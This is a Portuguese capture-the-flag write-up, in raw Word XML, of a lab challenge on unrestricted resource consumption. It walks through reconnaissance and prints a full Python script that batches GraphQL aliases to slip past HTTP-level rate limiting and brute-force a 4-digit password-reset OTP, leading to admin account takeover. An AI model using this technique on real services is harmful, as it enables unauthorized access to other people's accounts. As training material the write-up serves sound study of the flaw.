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8ut1m9nkhf8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c161dj8xfn6g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ao desafio de Unrestricted Resource Consumption.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Caso precise de suporte, favor abrir um ticket no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fn9p9te3d1id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60" w:lin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Iniciei o reconhecimento com um scan de portas para identificar os serviços expostos no alvo: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572125" cy="2076450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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0764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60" w:lin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O scan revelou duas portas abertas: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22/tcp — OpenSSH 9.6p1 (Ubuntu)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0" w:before="40" w:lin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80/tcp — Node.js Express framework, título: Backoffice -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60" w:lin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Acessando a aplicação no navegador, encontrei apenas uma página de login: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943600" cy="2994263"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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2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Com poucos vetores visíveis, parti para enumeração de diretórios com o ffuf:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001A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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3594100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Entre os resultados, dois arquivos chamaram atenção imediata: changelog.txt e package.json, ambos acessíveis publicamente com status 200.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C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Acessando http://172.16.12.111/changelog.txt foi possível identificar o email do desenvolvedor e detalhes da stack:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1346200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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Email do desenvolvedor: dev.backoffice@hackingclub.com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Versão 2.0.0 adicionou suporte a GraphQL e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Rotas REST antigas foram removidas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O package.json confirmou o uso de express-rate-limit como único mecanismo de proteção. Não havia nenhuma dependência de biblioteca GraphQL dedicada, indicando implementação customizada sem validações de segurança adequadas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000027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60" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4748213" cy="3102418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10241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Com o proxy ativo, interceptei o login e identifiquei que a aplicação usa GraphQL via mutation e também confirmou o rate limit aplicado no nível HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2223414"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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41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O problema: o express-rate-limit conta cada request HTTP como 1 unidade, mas o GraphQL permite múltiplas operações por request via aliases. Isso significa que 1 request HTTP pode executar 100 operações sem acionar o rate limit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000030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Usando o email encontrado no changelog, disparei o fluxo de recuperação de senha em /forgot. A aplicação enviou um OTP de 4 dígitos e retornou um tempToken fixo por sessão:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2937113"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="254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1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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3024984"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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98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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2524617"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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61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Com o OTP de apenas 4 dígitos (0000–9999 = 10.000 combinações) e sem lockout por tentativas, montei um script que agrupa 100 aliases por request. Assim, 100 requests HTTP cobrem todas as combinações possíveis sem nunca atingir o limite de 15 req/janela:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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40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requests</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041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042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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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email =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"dev.backoffice@hackingclub.com"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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temp_token =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"0IBs1ENUMBlV"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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url =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"http://172.16.4.74/graphql"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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use_proxy = True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="9334e6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proxy = {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"http"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"http://127.0.0.1:8080"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use_proxy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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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48">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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generate_query_part(start, end):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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query =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"query {\n"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B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in range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(start, end):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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code =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f"{i:04d}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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alias =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f"code_{code}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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query +=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f"""  {alias}: verifyOtp(email: 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{email}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", code: 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{code}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", tempToken: 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{temp_token}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") {{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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    status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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    message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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  }}\n"""</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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query +=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"}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053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"query"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: query}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054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found = False</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056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idx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in range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):  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="c5221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start = idx * </w:t>
      </w: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58">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="c5221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end = start + </w:t>
      </w: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59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payload = generate_query_part(start, end)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A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f"Enviando códigos de {start:04d} a {end-1:04d}..."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response = requests.post(</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E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url,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F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headers={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60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json=payload,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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proxies=proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062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63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time.sleep(</w:t>
      </w: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f"Status: {response.status_code}"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response.status_code == </w:t>
      </w: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6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data = response.json()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067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alias, result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data.get(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, {}).items():</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068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result[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].lower() !=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9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f"🟢 {alias} - {result}"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        found = True</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1967d2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06C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    else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D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"Erro na resposta:"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(response.text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F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found:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000070">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1967d2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071">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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"Fim."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after="0" w:lineRule="auto"/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60" w:lin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Cada request envia 100 operações distintas usando aliases GraphQL, quando o status retornado é diferente de 'error', o OTP correto foi encontrado, permitindo redefinir a senha e acessar a conta do administrador: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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3410291"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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29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60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1a1a1a"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="1a1a1a"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Após ter encontrado o código com sucesso, foi só utilizar ele para modificar/recuperar a senha do usuário dev.backoffice e se autenticar na aplicação e obter a flag.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>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3ot4mak0epkz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9" name="image9.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image9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5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842519685038pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image7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-295274</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5722620</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="299662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Unrestricted Resource Consumption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-295274</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5722620</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone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29966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3.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml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hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId18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Relationship Id="rId2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